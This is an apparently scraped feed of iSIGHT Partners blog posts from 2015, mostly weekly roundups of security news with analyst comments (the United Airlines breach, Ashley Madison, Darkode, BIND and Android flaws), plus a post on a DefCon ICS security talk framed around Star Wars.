Quantcast
Channel: iSIGHT Partners – iSIGHT Partners
Viewing all 59 articles
Browse latest View live

ThreatScape Media Highlights Update – Week Of July 29th

$
0
0

The following is this week’s sample of ThreatScape® Media Highlights – an email roundup of security headlines augmented by insights and analysis from iSIGHT Partners. Our cyber threat intelligence clients receive this update daily.

CHINA-TIED HACKERS THAT HIT U.S. SAID TO BREACH UNITED AIRLINES

Judgment Withheld

FROM THE MEDIA

The Chinese group believed to be responsible for the US Office of Personnel Management (OPM) and Anthem breaches has allegedly hacked United Airlines. The breach is said to have occurred in May or early June and has compromised a variety of IT systems. Compromised information ranges from passengers’ personal information to possibly United’s forward-looking mergers and acquisitions strategy.
Read the Story: Bloomberg

iSIGHT PARTNERS ANALYST COMMENT

Media reports reference TEMP.Avengers activity, a distinct subset of Chinese cyber espionage activity believed to have targeted multiple healthcare providers in early 2015. Along with the healthcare sector, TEMP.Avengers-identified infrastructure indicated the scope of the group’s activity included United Airlines, the OPM, IT services companies and foreign governments. It is likely the group is collecting personally identifiable information from a variety of sources to identify and exploit individuals with access to sensitive information for follow-on cyber espionage operations.

RELATED iSIGHT PARTNERS REPORTS

15-00004452 (TEMP.Avengers Linked to Anthem Breach), 21 May 2015
15-00001674 (TEMP.Avengers Health Care Breaches), 20 March 2015
Intel-1346271 (TEMP.Avengers Activity), 10 Feb. 2015

CRITICAL VULNERABILITY IN APPLE APP STORE, iTUNES REVEALED

Media On-Target

FROM THE MEDIA

A critical flaw has recently been discovered in Apple’s App Store and iTunes invoice system. The persistent injection flaw could lead to session hijacking and malicious invoice manipulation. Specifically, an attacker could exploit the vulnerability by manipulating a device cell name though the exchange of malicious scripted code.
Read the Story: ZDNet

iSIGHT PARTNERS ANALYST COMMENT

The flaw certainly appears to be a legitimate cross-site scripting (XSS) attack resulting from improper input validation of a device’s name, which is a user-supplied field. When an attacker provides malicious code as a device name, it is processed and rendered as part of the HTML code used to generate invoices automatically, allowing an attacker to perform a number of different potentially malicious actions (including session hijacking, phishing and redirection) following a purchase. This vulnerability has already been patched, mitigating the risk this flaw poses to Apple App Store and iTunes clients.

RELATED iSIGHT PARTNERS REPORTS

Intel-936221 (Analysis of Common XSS Vectors and Mitigation Measures), 20 Sept. 2013
Intel-874890 (Mitigating XSS Attacks), 2 July 2013

ANONYMOUS RELEASE HACKED CSIS DOCUMENT AFTER MEMBER’S DEATH, THREATENS TO LEAK ‘STUNNING SECRETS’

Media On-Target

FROM THE MEDIA

Anonymous has allegedly released a Canadian government document containing sensitive communications and information about the Canadian Security Intelligence Service’s (CSIS) information sharing system. Government officials have not confirmed the document’s legitimacy. Anonymous released the document with a recorded video.
Read the Story: National Post

iSIGHT PARTNERS ANALYST COMMENT

Hacktivist actors have been targeting Canadian government agency websites for a number of months in opposition to the Canadian surveillance law dubbed “C-51.” The document appears authentic and has been implicitly confirmed by Canadian authorities. According to media reports, the actors possess additional documentation they are considering releasing in the near-term. The actors’ delay in releasing the additional documents is likely associated with a mix of track-covering measures and apprehension over law enforcement reprisal.

RELATED iSIGHT PARTNERS REPORTS

15-00006296 (Hacktivist Group Targets Canadian Govt. for Operation #OpC51), 6 July 2015
15-00005646 (Weekly Hacktivist Operation Update for #OpC51), 22 June 2015
15-00005580 (Hacktivists Target Canadian Govt. Domains), 19 June 2015

PLANNED PARENTHOOD REPORTEDLY HACKED

Media On-Target

FROM THE MEDIA

Anti-abortion activists hacked Planned Parenthood’s website and were allegedly able to gain access to the organization’s online database and employee information. The hackers have threatened to release Planned Parenthood’s internal e-mails.
Read the Story: CS Monitor

iSIGHT PARTNERS ANALYST COMMENT

The group claiming responsibility for the breach, 3301, appears to be led by the actor “E.” iSIGHT Partners has observed no previous activity by this group. After the intrusion, allegedly executed via SQL injection, the attackers posted the e-mail addresses and passwords, though the passwords are hashed as MD5s and salted. The attackers claim staff e-mails will be released once decrypted, though—given the difficulty of reversing properly salted MD5 passwords—it is uncertain they have the capability to do so.

RELATED iSIGHT PARTNERS REPORTS

15-00007386 (Hacktivist Operations for July 27, 2015), 28 July 2015
Intel-360120 (Contraceptive Pill Website Targeted), 23 Feb. 2011

DARKODE FORUM RESURFACES

Media On-Target

FROM THE MEDIA

The Darkode website, taken down by authorities on July 15, has resurfaced. According to the new website, the takedown only focused on new and long-retired individuals. Furthermore, the post indicated that most of the staff remains intact, including senior members, and that the site will relaunch soon, with new security measures.
Read the Story: Security Week

iSIGHT PARTNERS ANALYST COMMENT

If Darkcode’s leading members were residing in Russia or other countries without an extradition agreement with the US or European countries, then they were most likely not affected by the recent law enforcement activity. While US and cooperating law enforcement agencies were able to take down the infrastructure supporting Darkode, this portion of the forum leadership was likely easily able to set up new infrastructure to continue their activities. To be most effective, law enforcement activity requires cooperation of cyber criminals’ host countries to detain suspected administrators, organizers and other core members of criminal groups.

RELATED iSIGHT PARTNERS REPORTS

ThreatScape Media Highlights (Cyber Criminal Forum Taken Down), 16 July 2015
Intel-1295446 (eCrime Marketplaces Taken Down in ‘Operation Onymous’ Almost Certainly Being Replaced by Alternatives), 24 Nov. 2014
15-00003500 (Russian Law Enforcement Arrests Individuals Connected to SVPENG, Likely to Discourage Russian Criminals from Using Mobile Malware against Russian Victims), 30 April 2015

 

The post ThreatScape Media Highlights Update – Week Of July 29th appeared first on iSIGHT Partners.


ThreatScape Media Highlights Update – Week Of August 5th

$
0
0

The following is this week’s sample of ThreatScape® Media Highlights – an email roundup of security headlines augmented by insights and analysis from iSIGHT Partners. Our cyber threat intelligence clients receive this update daily.

HACKERS TARGET INTERNET ADDRESS BUG TO DISRUPT SITES

FROM THE MEDIA

A recently identified flaw in BIND, a common variety of Domain Name System (DNS) software, is allowing actors to execute a denial-of-service (DoS) attack on websites. The flaw allows attackers to crash the affected servers’ software, and thus create a DoS condition; this may render certain websites inaccessible to some users. A patch for the flaw has been issued, however, many systems are yet to be patched and real attacks using the flaw have been observed.
Read the Story: BBC

iSIGHT PARTNERS ANALYST COMMENT

CVE-2015-5477 is an unspecified vulnerability that exists because of the incorrect handling of TKEY queries in the Internet Systems Consortium (ISC) BIND versions 9.10.2-P2 and earlier that can allow a remote attacker to create a sustained DoS condition. We believe this represents a high-risk vulnerability due to its sustained nature and the availability of exploit code in the wild. However, the flaw does not represent a direct risk of code execution and is not as significant a concern to the average user or enterprise as other high-risk vulnerabilities may be.

RELATED iSIGHT PARTNERS REPORTS

15-00007430 (CVE-2015-5477), 4 Aug. 2015
Intel-1243080 (DNS Security Highlights), 25 Sept. 2014

DONALD TRUMP’S WEBSITE DEFACED BY JON STEWART FANS

Media On-Target

FROM THE MEDIA

Hackers belonging to Telecomix Canada, a smaller branch of Anonymous, have hacked and defaced Donald Trump’s website. The hackers posted a farewell note to Jon Stewart, the host of the television show “The Daily Show.” Analysis of Trump’s website indicates that the hack was likely due to the compromise of the website’s content management system.
Read the Story: Softpedia

iSIGHT PARTNERS ANALYST COMMENT

The attack was motivated by the public feud between Trump and Stewart. Trump’s Presidential campaign has been controversial due to comments about Hispanic immigrants, questions surrounding the authenticity of his interest in the Presidency and his colorful background. He may be subject to additional targeting by other hacktivist actors seeking to embarrass him if he is perceived as criticizing groups that hacktivist actors consider marginalized, such as Hispanic immigrants.

RELATED iSIGHT PARTNERS REPORTS

15-00007606 (Hacktivist Operations Report for Aug. 3, 2015), 3 Aug. 2015
Intel-616725 (Actor Threatening Olympics-Related Sites Associated with Telecomix), 30 July 2012
Intel-423585 (Telecomix Builds Communication Pathways for Egyptian Dissidents), 29 June 2011

INTERNET EXPERTS SUBMIT PLAN FOR US TO CEDE CONTROL OF ICANN

Media On-Target

FROM THE MEDIA

Internet experts have released a proposal showing how the United States can cede oversight of ICANN to the organization itself and a consortium of interested non-government parties. The proposal recommends establishing a separate subsidiary to operate the technical functions of managing the internet’s name and address system. The proposal further recommends that no government or inter-government organizations fall into the oversight committee.
Read the Story: The Guardian

iSIGHT PARTNERS ANALYST COMMENT

The United States has planned to give up control of ICANN, in part due to international complaints about US internet surveillance in 2014. We expect plans for ICANN’s control and processes will be heavily debated as the change to multi-stakeholder oversight represents an opportunity for nations to increase their influence over Internet management.

RELATED iSIGHT PARTNERS REPORTS

14-00000216 (SEA Possibly Responsible for Recent Spear-Phishing Campaign against ICANN), 29 Dec. 2014
Intel-1078858 (Overview: Global Internet Governance), 25 April 2014
Intel-1064288 (US Plans to Relinquish ICANN Oversight to International Entity), 28 March 2014

CHINESE VPN HACKS INTO WINDOWS SERVERS ADDING THEM TO ITS NETWORK

FROM THE MEDIA

A commercial VPN located in China allegedly hijacks legitimate servers and includes them in its own network. Experts from RSA have published a report detailing the VPN, dubbed Terracotta VPN. The VPN allegedly hacks into Windows-based servers mostly located in China, South Korea and the US. According to the report, the majority of servers belong to universities, hotels and various US government departments.
Read the Story: Softpedia

iSIGHT PARTNERS ANALYST COMMENT

Untrusted third party VPN services may not provide ethical or legal products and, in this case, may be doing so to provide infrastructure for cyber espionage actors. By leveraging unauthorized access to provide a pseudo-legitimate service, financially motivated attackers generate a monetization pathway that allows them to profit from the successful compromise of servers. Based on this report, use of the Terracotta VPN may present a risk greater than other VPN services.

RELATED iSIGHT PARTNERS REPORTS

ThreatScape Media Highlights (You Joined a Botnet if You Use Hola’s VPN Service), 1 June 2015
 15-00003244 (Discussion of Threat Posed By Third-Party Software Providers), 21 April 2015

 

The post ThreatScape Media Highlights Update – Week Of August 5th appeared first on iSIGHT Partners.

ThreatScape Media Highlights Update – Week Of August 12th

$
0
0

The following is this week’s sample of ThreatScape® Media Highlights – an email roundup of security headlines augmented by insights and analysis from iSIGHT Partners. Our cyber threat intelligence clients receive this update daily.

HACKERS STOLE NEWS RELEASES, MADE $100M FROM TRADES

FROM THE MEDIA

The US Securities and Exchange Commission and the US Department of Justice filed charges against 32 individuals for allegedly hacking newswire services and performing stock trades based on unreleased information from the services. The suspects allegedly made a total of $100 million from the scheme. Officials believe two of the individuals, Ukrainian men, hacked the newswire services while the rest made stock trades. The two Ukrainians are believed to have conducted the operation for over five years, hacking at least two newswire services.
Read the Story:  Fox

iSIGHT PARTNERS ANALYST COMMENT

Multiple cyber criminals have conducted or at least attempted to manipulate the stock market in the past. In this case, the actors used compromised access to news outlets to obtain an unfair advantage. In addition to this tactic, we have also observed direct targeting of stock exchanges and attempts to influence the market via DDoS attacks. This type of illicit profiteering undermines public trust in the stock market as a whole and creates unnatural fluctuations and opportunity costs for current and would-be shareholders. However, since this scheme monetized the knowledge from the newswire services rather than compromised access to accounts, the effect may not have been easily detected by its victims thus allowing the actors to avoid notice and persist for relatively long periods of time.

RELATED iSIGHT PARTNERS REPORTS

Intel-1021738 (Ukrainian Stock Exchange Targeted by DDoS Attacks; Market Possibly Affected), 21 Jan. 2014
Intel-902080 (Actor Attempts to Sell Insider Access to DASDEC Emergency Alert System), 31 July 2013
Intel-597522 (Russian-Speaking Actor Seeking Access to US News Sites, Including CNBC, CNN and FOX News), 26 June 2012

ADROID VULNERABILITY LETS HACKERS REPLACE APPS ON YOUR DEVICE

Media On-Target

FROM THE MEDIA

Researchers discovered a vulnerability in Android’s OpenSSLX509Certificate class that could allow an attacker to escalate an app’s access privileges. Hackers would only need a small amount of code to exploit the flaw and thus could hide it in a legitimate app to gain system-level privileges. Actors could download malicious APKs and use them to replace legitimate apps.
Read the Story: Softpedia

iSIGHT PARTNERS ANALYST COMMENT

CVE-2014-3153 is an unspecified vulnerability in Linux Kernel versions 3.14.5 and earlier. The vulnerability was publically disclosed over a year ago (and exploit code has been publically available for just as long), but its ability to affect Android devices using versions 4.3 to 5.1 of the OS was not previously realized. This vulnerability could allow an attacker to conduct a number of malicious activities through a compromised device, so we recommend implementing the already-released patch for this issue as well as limiting app installations to those from verified vendor stores on any device.

RELATED iSIGHT PARTNERS REPORTS

14-31221 (CVE-2014-3153), 25 Nov. 2014
15-00007664 (Android Stagefright Vulnerability, One of Seven), 5 Aug. 2015

UK COUNCILS SUFFER OVER 4,000 SENSITIVE DATA BREACHES IN THREE YEARS

Media On-Target

FROM THE MEDIA

Privacy group Big Brother Watch recently released the “A Breach of Trust” report and found that 4,236 sensitive data breach incidents involving local government councils in the UK occurred between April 2011 and April 2014. Furthermore, there were 628 occurrences where data was incorrectly or inappropriately shared via e-mail, and 99 cases of unauthorized individuals accessing data. Big Brother Watch has called for tighter data breach regulations and suggested jail time for council workers in serious cases.
Read the Story: V3

iSIGHT PARTNERS ANALYST COMMENT

The report found only one in ten incidents led to disciplinary action, suggesting a widespread failure to create or enforce policy that may have reduced the rate or severity of data breaches. Councils’ failure to properly handle and report data breaches may result in actors gaining access to citizens’ or council members’ personally identifiable information (PII).

RELATED iSIGHT PARTNERS REPORTS

15-00006858 (Cyber Criminal Theft and Exploitation of Databases: Targeted Data, Targeted Industries and Malicious Uses), 11 Aug. 2015
15-00004862 (Cyber Criminal in Russian Community Seeks Tax Credentials Stolen from US Tax Payers), 4 June 2015

ASPROX BOTNET, A LONG-RUNNING NUISSANCE, DISAPPEARS

FROM THE MEDIA

Asprox botnet’s command and control servers have shut down, according to Palo Alto Networks. The botnet, which conducts malware-spamming activities, had been active for years. Researchers have commented that the botnet’s operators may be regrouping to evade detection. The botnet is known for sending spam e-mails purporting to be court notices or to come from delivery services such as FedEx.
Read the Story: Computer World

iSIGHT PARTNERS ANALYST COMMENT

In early 2015, iSIGHT Partners reported on Asprox’s inactivity; we have not observed any further activity since that time. However, in light of the availability of other underground malware distribution services, we do not think its disappearance as a major spam and malware distribution network has had a significant impact on the overall threat posed by malicious mass-mailing services and spam e-mail.

RELATED iSIGHT PARTNERS REPORTS

15-00001062 (Asprox Spam and Malware Distribution Network Inactive Since January 2015), 25 March 2015
15-00000546 (Zemot: Behavior, Capabilities and Communications), 19 Feb. 2015
14-33167 (Kuluoz: The Asprox Botnet’s Field Agent), 24 Oct. 2014

FIREFOX 42 WILL NOT ALLOW THE INSTALLATION OF UNSIGNED EXTENSIONS

FROM THE MEDIA

Mozilla announced that, due to security concerns, Firefox 42 will prohibit installation of unsigned extensions. Installation of unsigned extensions was first allowed in Firefox 40 but came with a warning. Firefox 41 only permitted installation if a special option was enabled. According to Mozilla, developers are increasingly abusing Mozilla’s add-on installation procedures; some even use them to redirect users to malware.
Read the Story: Softpedia

iSIGHT PARTNERS ANALYST COMMENT

Malicious extensions often conduct unwanted advertising and credential collection functions, and may redirect users to pages without their knowledge, actions representing a significant risk to browser security. Although we expect adversaries will attempt to bypass Mozilla’s automated checking process, preventing users’ ability to install unsigned extensions should improve user security.

RELATED iSIGHT PARTNERS REPORTS

15-00003244 (Superfish, PrivDog, Demonstrate Continued Threat Third-Party Software Poses to SSL), 21 April 2015
Intel-1259793 (Advanced Browser Tracking Techniques Developed for Advertising Could Pose Security Risks), 17 Oct. 2014

 

The post ThreatScape Media Highlights Update – Week Of August 12th appeared first on iSIGHT Partners.

ThreatScape Media Highlights Update – Week Of August 19th

$
0
0

The following is this week’s sample of ThreatScape® Media Highlights – an email roundup of security headlines augmented by insights and analysis from iSIGHT Partners. Our cyber threat intelligence clients receive this update daily.

STOLEN ASHLEY MADISON USER DATA PUBLISHED BY HACKERS

FROM THE MEDIA

The hackers who breached the dating website Ashley Madison recently published the stolen customer data. Allegedly, the stolen data has been leaked on the dark web, which cannot be accessed through conventional search methods such as Google. Released customer data consists of 9.7 GB of personal information, such as credit card information and customers’ names.
Read the Story:  CNN

iSIGHT PARTNERS ANALYST COMMENT

The release was expected, as the Impact Team had demanded Ashley Madison be shuttered in exchange for not posting the data—a demand that was almost certainly not going to be met. If they have not already done so in the month since the breach was publicized, Ashley Madison clients should cancel any credit cards and change any e-mail accounts and passwords they suspect have been exposed. The group has previously expressed concern over law enforcement retribution and likely used TOR in an attempt to maintain operational security.

RELATED iSIGHT PARTNERS REPORTS

15-00008538 (Alert: Full Leak of Ashley Madison Data Posted), 18 Aug. 2015
15-00007120 (Impact Team Leaks Sample Data from Ashley Madison), 20 July 2015

CHINESE POLICE ARREST 15,000 FOR INTERNET CRIMES

FROM THE MEDIA

Police in China have arrested around 15,000 individuals for crimes that “jeopardized Internet security.” According to officials, the police have investigated 7,400 cyber crime cases; however, no timeline was provided detailing over what period the 15,000 arrests were made. China initiated a six-month-long campaign last month named “Cleaning the Internet,” which will focus on breaking cases and disrupting online gangs.
Read the Story: NDTV

iSIGHT PARTNERS ANALYST COMMENT

China continues its well-known practice of arresting individuals for failing to adhere to regulations, which include the regulation of political speech. Considering that there was neither a timeline provided nor an outline of what crimes individuals were arrested for, the number may simply be used to promote the image and perceived strength of the Chinese security apparatus.

RELATED iSIGHT PARTNERS REPORTS

15-00007002 (Draft Cyber Security Law Would Codify Existing Policies; Likely to Raise the Cost of Doing Business in China), 15 July 2015
14-00000090 (Country Threat Profile: China), 24 Dec. 2014

NUMBER OF DDOS ATTACKS ARE UP AGAIN, PARTICULARLY ‘MEGA’ ASSAULTS

Media On-Target

FROM THE MEDIA

Large-scale “mega” DDoS attacks continue to increase, according to Akamai’s Q2 2015 State of the Internet report. In Q2, 12 attacks exceeding 100 Gbps took place. The largest observed attack (240Gbps) lasted over 13 hours. Akamai also noted a trend of less powerful attacks with longer durations.
Read the Story: IT Pro Portal

iSIGHT PARTNERS ANALYST COMMENT

The growth of DDoS attacks in the last year is likely to due to the continued development of commercial DDoS services and the apparent growth of DDoS extortion campaigns. Commercial DDoS services allow a wider range of actors (particularly gamers) to launch DDoS attacks for a low fee without the time, cost and expertise needed to develop their own DDoS capability. DDoS extortion campaigns create direct financial incentive for the creation and maintenance of extremely powerful DDoS capabilities.

RELATED iSIGHT PARTNERS REPORTS

15-00007358 (DD4BC Attacks Increasingly Affect Small Business Enterprises with an Online Presence), 4 Aug. 2015
15-00007290 (Threats to Cloud Providers), 31 July 2015
15-00007278 (Notable Developments in Cyber Crime and Tools during June 2015), 29 July 2015

“DARKODE” HACKER PLEADS GUILTY TO DISTRIBUTING FACEBOOK MALWARE

FROM THE MEDIA

Hacker Eric Croker, aka Phastman, has been charged with assisting other actors in gaining unauthorized access to over 77,000 computers though Darkcode, an online hacking forum. Croker was among 12 arrested after authorities took down Darkcode in July. He pleaded guilty to the charges, admitting to selling access to a botnet of compromised Facebook accounts.
Read the Story: Trip Wire

iSIGHT PARTNERS ANALYST COMMENT

Law enforcement is generally effective against individual operators or small groups operating in the same jurisdiction, as distributed tactics and tools used across borders can pose difficulties for law enforcement. Croker’s malicious activity will likely be continued by another actor using the same or similar malware given the common nature of similar operations in the underground. Users should be wary of clicking unknown links in Facebook, even those sent by the users’ friends.

RELATED iSIGHT PARTNERS REPORTS

15-00005418 (Group Profile: Lizard Squad), 26 June 2015
15-00005616 (Social Engineering Techniques Being Used Against Consumer Organizations to Facilitate Swatting Attacks), 19 June 2015
ThreatScape Media Highlights (Darkode Forum Resurfaces), 29 July 2015

THE NEW CYBER ATTACKS THREATENING PUBLIC SECTOR COMPANIES

FROM THE MEDIA

Cyber criminals have become more sophisticated, using existing methods of attack in new ways, according to Trend Micro. The company reported a 50 percent increase in the integration of the Angler exploit kit, a 67 percent increase in overall exploit-kit threats. It also reported increasingly specific targeting of the CryptoWall ransomware, with 79 percent of its infections occurring in the US.
Read the Story: Tech Week

iSIGHT PARTNERS ANALYST COMMENT

At the beginning of the year, iSIGHT Partners predicted an increase in the quantity and variety of threats. Researchers and sophisticated adversaries continue to develop novel means of conducting malicious activities. The novel work done by sophisticated actors becomes more widely accessible through education and sharing of techniques in the underground, proliferating them to less sophisticated actors.

RELATED iSIGHT PARTNERS REPORTS

15-00001636 (Wide-Ranging Predictions for 2015 Generally Expect Increase in Quantity and Variety of Adversary Activity), 20 March 2015
15-00001552 (Annual ThreatScape Report 2014—A Comprehensive Analysis of the Global Cyber Adversary Landscape), 18 March 2015

CHINESE RIGHTS WEBSITES HIT BY SUSPECTED HACKER ATTACK, GREAT FIREWALL BLOCKADE

FROM THE MEDIA

Unidentified hackers recently attacked a Chinese journalism website, affecting the site’s ability to allow contributors to upload posts. The website’s founder indicated that the hack did not affect articles or the homepage itself. He further noted the attack may also have affected the registration page, which is currently not functioning.
Read the Story: Radio Free Asia

iSIGHT PARTNERS ANALYST COMMENT

While attribution for this attack is unknown, the most likely culprits include the Chinese government, pro-government hacktivists, or someone whose misdeeds the website was exposing. The site’s coverage has likely earned it many opponents, and DDoS contract services are fairly inexpensive to rent. Additionally, the Chinese economy has recently experienced a number of financial shocks, amidst a general economic slowdown. The Chinese government, anxious about domestic instability, may be prompting these attacks in order to limit the availability of information that could spark unrest and opposition.

RELATED iSIGHT PARTNERS REPORTS

15-00002380 (Anti-Censorship Tools Hosted on GitHub Targeted by DDoS Attack), 3 Apr. 2015
15-00007312 (Turkish Hacktivists Target Chinese Websites), 24 July 2015

 

The post ThreatScape Media Highlights Update – Week Of August 19th appeared first on iSIGHT Partners.

ThreatScape Media Highlights Update – Week Of August 26th

$
0
0

The following is this week’s sample of ThreatScape® Media Highlights – an email roundup of security headlines augmented by insights and analysis from iSIGHT Partners. Our cyber threat intelligence clients receive this update daily.


 Wednesday, 26 August 2015

Download PDF Version Here

JOHN MCAFEE CLAIMS ASHLEY MADISION EMPLOYEE RESPONSIBLE FOR LEAKED DATA

FROM THE MEDIA

McAfee Founder, John McAfee, has publicly claimed that the Ashley Madison hack, which Impact Team claimed responsibility for, was actually the work of a female employee of the company. Mr. McAfee has based this assessment on the type of data that was selectively obtained and released, as well as the language Impact Team used.
Read the Story: Softpedia

iSIGHT PARTNERS ANALYST COMMENT
We cannot confirm John McAfee’s assessment at this time. However, it is certainly plausible, and an insider attack would explain how the attackers were able to identify, access and exfiltrate sensitive information undetected. Additionally, when the breach was first made public, Avid Media CEO Noel Biderman claimed in interviews that an insider caused the breach. McAfee’s assertion that the breach was perpetrated by a woman is much more speculative. The incident highlights insider threats, which can be more damaging because employees are granted greater access to sensitive information.

RELATED iSIGHT PARTNERS REPORTS

ThreatScape Media Highlights (Impact Team Claims to Have 300GB More Data from the Ashley Madison Leak), 24 Aug. 2015
15-00008538 (Review of Impact Team’s Large-Scale Data Leak on August 17, 2015), 18 Aug. 2015


IBM NOTES AN INCREASE IN MALICIOUS USE OF THE TOR NETWORK

Media On-Target

FROM THE MEDIA

In a recent quarterly report, IBM noted an increase in Tor exit nodes and malicious traffic coming from the network. The most prominent malicious traffic types IBM observed were related to SQL injections, vulnerability scanning and DDoS attacks.
Read the Story: Softpedia

iSIGHT PARTNERS ANALYST COMMENT
Many types of malware and criminal schemes use the Tor network for command and control or other infrastructure in addition to the attack types noted by IBM, such as ransomware using TOR sites for ransom payments. Entities can mitigate some potential threats related to TOR traffic by blocking all TOR exit nodes, but as the list of nodes changes regularly and there are multiple methods (such as TOR bridge relays) that allow users to bypass the known exit nodes, blocking nodes is of limited use.

RELATED iSIGHT PARTNERS REPORTS
15-00003702 (Weekly Vulnerability and Network Activity Report), 8 May 2015
Intel-987949 (Brobot Botnet Performs to Limited DDoS Attacks on Non-Financial Targets in Probable Continuation of Reduced Activity Level), 31 Oct. 2013


APPLICATION EXPLOITING CERTIFI-GATE VULNERABILITY IDENTIFIED AND REMOVED FROM GOOGLE’S APPSTORE

Media On-Target

FROM THE MEDIA

Google recently removed an app from the Google Play Store that was exploiting the Certifi-gate vulnerability. The vulnerability, disclosed at this year’s Blackhat conference, allows for remote control of a victim’s device through either a malicious app or SMS message.
Read the Story: Threatpost

iSIGHT PARTNERS ANALYST COMMENT
Although this vulnerability is already being exploited in the wild, we believe it poses only a limited threat to Android users in both the short and long term; only 16 percent of scanned devices were found vulnerable, and only 3 devices were confirmed to be exploited (it is unclear how many devices were scanned). Users with vulnerable devices must wait for their phone manufacturers to issue patches. The app removed by Google, Recordable Activator, was the only app known to exploit the vulnerability.

RELATED iSIGHT PARTNERS REPORTS
15-00008658 (Weekly Vulnerability Exploitation Report), 24 Aug. 2015
15-00007652 (Report for Recent Android Stagefright Vulnerability (CVE-2015-3824)), 5 Aug. 2015


AUTOIT FREEWARE BEING USED IN REMOTE-ACCESS TROJAN DISTRIBUTION

FROM THE MEDIA

Security researchers from CISCO recently stated that a malicious campaign has been utilizing the AUTOIT freeware to distribute remote-access Trojans. The campaign, impersonating a legitimate business, tries to convince victims to enable macros, which initiates the attack.
Read the Story: Threatpost

iSIGHT PARTNERS ANALYST COMMENT
Since Microsoft Word’s default setting is to disable macros, users must be socially engineered into enabling macros for the malicious schemes described to work. Users should be extremely cautious about enabling macros on a document, especially documents from an unknown person. Users should follow up with the sender regarding any documents requesting use of macros that they believe to be legitimate.

RELATED iSIGHT PARTNERS REPORTS
15-00006468 (TEMP.Beanie Reveals Expanded Scope, Scale and Persistence of Operational Capabilities; Ties to Ajax Team), 23 July 2015
15-00000436 (Dyre Credential Theft Malware: Capabilities and Observed Uses), 8 May 2015
15-00000498 (Sony Attack Leveraged in Lure Attempt Employing Malicious Macro by Fallout Team), 24 Feb. 2015


GITHUB MITIGATES DDOS ATTACK AGAINST THEIR SERVERS

FROM THE MEDIA

On August 25, 2015, around 5:30 a.m. EDT, the code repository site GitHub began experiencing connectivity issues. The site announced it was being targeted by DDoS attacks, but was able to return to service as normal around 9:00 a.m. EDT. While GitHub has not commented on the attack yet, the media is speculating possible links to the March 2015 Chinese-origin attack.
Read the Story: Threatpost

iSIGHT PARTNERS ANALYST COMMENT
Without evidence to link this incident to the March attack, speculating Chinese responsibility for the attack is premature. A wide range of entities could be responsible, as the barrier to entry for DDoS capability is fairly low. Because of its high profile in the development community, Github is often targeting by actors with a wide variety of motivations, many of whom could have conducted this attack.

RELATED iSIGHT PARTNERS REPORTS
15-00002380 (Anti-Censorship Tools Hosted on GitHub Prompt DDoS Attack), 3 April 2015
ThreatScape Media Highlights (US Coding Website GitHub Hit with High Intensity DDoS Attack), 30 March 2015

The post ThreatScape Media Highlights Update – Week Of August 26th appeared first on iSIGHT Partners.

ICS Security for Noobz…from DefCon 23

$
0
0

A Intro on Hacking Industrial Control Systems…In Order to Better Defend Them

Last year the largest hacker conference in the world, DefCon, experienced something for the first time: an Industrial Control Systems Village. Villages are specialized areas within the conference, dedicated to a portion of cyber security. This village was dedicated purely to hacking Industrial Control Systems (ICS) as a way to better understand their weaknesses and thus identify better ways to protect them. Throughout DefCon, thousands of hackers and security experts from all over the globe came running to the ICS Village. They hoped to fulfill their Hollywood-inspired dreams of hacking traffic control systems, exploding chemical production facilities, backing up the sewage to their ex’s house, or who knows what else.

They were greeted with a water filtration system plant on one wall, a small army of miniature robot arms and switches, a home-automated brewery, and more. Exuberant, they sat down and plugged into the Programmable Logic Controllers (PLCs) that controlled them…and scratched their heads.

They had direct access to devices that controlled an array of robots, switches, pumps, valves, and filters, and they weren’t sure what to do. They ran Nmap and scanned every port for openings, and searched for known exploits in Metasploit, but these devices befuddled them.

As those of us that were running the ICS Village prepared for this year’s DefCon, we contemplated how we could help attendees get started. Last year taught us that, for many, ICS environments were somewhat alien. So, I decided to give a presentation in the village that would introduce them to the world of hacking and protecting Industrial Control Systems in a language we can all understand: Star Wars.

Thus…(Cue John Williams)…“ICS Sec for n00bz: An Introduction to ICS Hacking by Attacking the Death Star” was born.

The premise:

Did you know there are hackers in Star Wars? They’re called slicers. Slicers are so similar to hackers that once, an anonymous slicer even told Lord Vader not to use his pet’s name for a password. For two half-hour sessions in the ICS Village, I became a slicer instructor to a select group of Rebel Alliance fighters. After all, wouldn’t it be better to hack the Death Star than to send our last X-Wing fighters into a death trap?

As you might imagine, something as awesome as the Death Star is comprised of many Industrial Control Systems. Industrial Control Systems are computer systems that control industrial facilities and operations. For example, electricity generation, building automation, weapons systems, etc. Oil and Natural Gas is an excellent example, but we have no intelligence that there are oil refineries aboard the Death Star. Control Systems are the computers and devices that make those facilities work. The androids that build more androids and AT-AT walkers, HVAC aboard the Millennium Falcon and your X or Y-Wing, shield generators, hyper drives – all these things are controlled by Industrial Control Systems.

In the presentation, I introduce the basic elements of an ICS network and how the components interact with each other. We look at an ICS network diagram retrieved from the Empirical database, comprised of the ISA95 and ISA99 documentation. Many Bothans died to get this information…(Just kidding, this is a real thing. Look it up.)

Perhaps more important than the technical jargon and protocols, however, is the thought process that must go into attacking an ICS network in order to better secure it.

First, gaining access: in many ways, an ICS network is like going back in time a couple decades. Vulnerabilities and practices that we might have thought were abolished have just been chased into the ancient underbelly of industrial controls. These old systems may still have hard-coded passwords written into the firmware that you can’t disable, clear-text communications, all ports left open by default, a complete lack of authentication, and more. Sometimes the software’s own manual can be your best penetration-testing tool.

But what do you do once you get into a control device? That all depends on your ultimate goal…and along with understanding the vulnerable pathways to access, understanding what a hacker wants to do is incredibly important to securing against that outcome. In the presentation we look at the goals of potential ICS hackers. Is the intrusion for Industrial espionage? Maybe you should just copy their code and keep a silent eye on their production process – unless you want to sabotage a competitor so you can release a product first. In that case, you might gradually alter the number of degrees a robot arm is rotating, so it starts destroying its own process and puts them behind schedule. Or you might put significant wear on a cooling fan or change the desired temperature so a process overheats, destroying products or damaging production facilities. Are you a state sponsored actor, such as a Rebel Alliance slicer trying to destroy the Death Star, or an Empirical Storm Trooper tasked with defending it? We look at motives behind those intrusions and others in the presentation as well.

You can see a few minutes of the talk below/can ask the DefCon team for the full video if you’re interested.

You can also DOWNLOAD the full presentation by clicking here – and if you have questions/want to engage in dialogue on any of it, you can drop me a line at kturner@isightpartners.com

Take a read through the slides/watch the presentation and let’s talk.

 

The post ICS Security for Noobz…from DefCon 23 appeared first on iSIGHT Partners.

ThreatScape Media Highlights Update – Week Of September 2nd

$
0
0

The following is this week’s sample of ThreatScape® Media Highlights – an email roundup of security headlines augmented by insights and analysis from iSIGHT Partners. Our cyber threat intelligence clients receive this update daily.


 Wednesday, 2 September 2015 

Download PDF Version Here

